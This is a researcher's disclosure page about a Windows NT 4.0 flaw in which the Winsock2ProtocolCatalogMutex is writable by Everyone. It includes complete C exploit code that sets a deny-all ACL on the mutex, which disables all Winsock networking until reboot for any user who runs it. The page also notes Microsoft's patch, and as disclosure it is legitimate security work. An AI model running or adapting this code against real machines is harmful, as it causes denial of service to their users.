logo
line
HOME
TOOLBOX
ON MY MIND RIGHT NOW
MISC
ABOUT
line
forest

Winsock Mutex Vulnerability in Windows NT 4.0 SP6 and below

There is a mutex called Winsock2ProtocolCatalogMutex in Windows NT 4.0, to which the Everyone group has Full Control. Any user can change this to No Access, and that disables all network connectivity through Winsock until the system is rebooted.

Vendor Response:

Microsoft has released a patch and you can read more about it in their Security Bulletin.

Sample exploit code:

/*
/* mutation.c - (c) 2000, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
/*                        http://ntsecurity.nu
/*
/* - Disables all network connectivity through Winsock
/* - Can be run from any account (e.g. an ordinary User account)
/*
*/
				
#include <windows.h>
#include <aclapi.h>
int main(void)
{
	PSID pEveryoneSID;
	SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
	PACL pDacl;
	DWORD sizeNeeded;

	AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID, 0, 0, 0,
		0, 0, 0, 0, &pEveryoneSID);
	sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) +
		GetLengthSid(pEveryoneSID) - sizeof(DWORD);
	pDacl = (PACL) malloc(sizeNeeded);
	InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);
	AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);
	SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex",
		SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL,
		pDacl, NULL);
	free(pDacl);
	return 0;
}
				



© Arne Vidstrom. All rights reserved.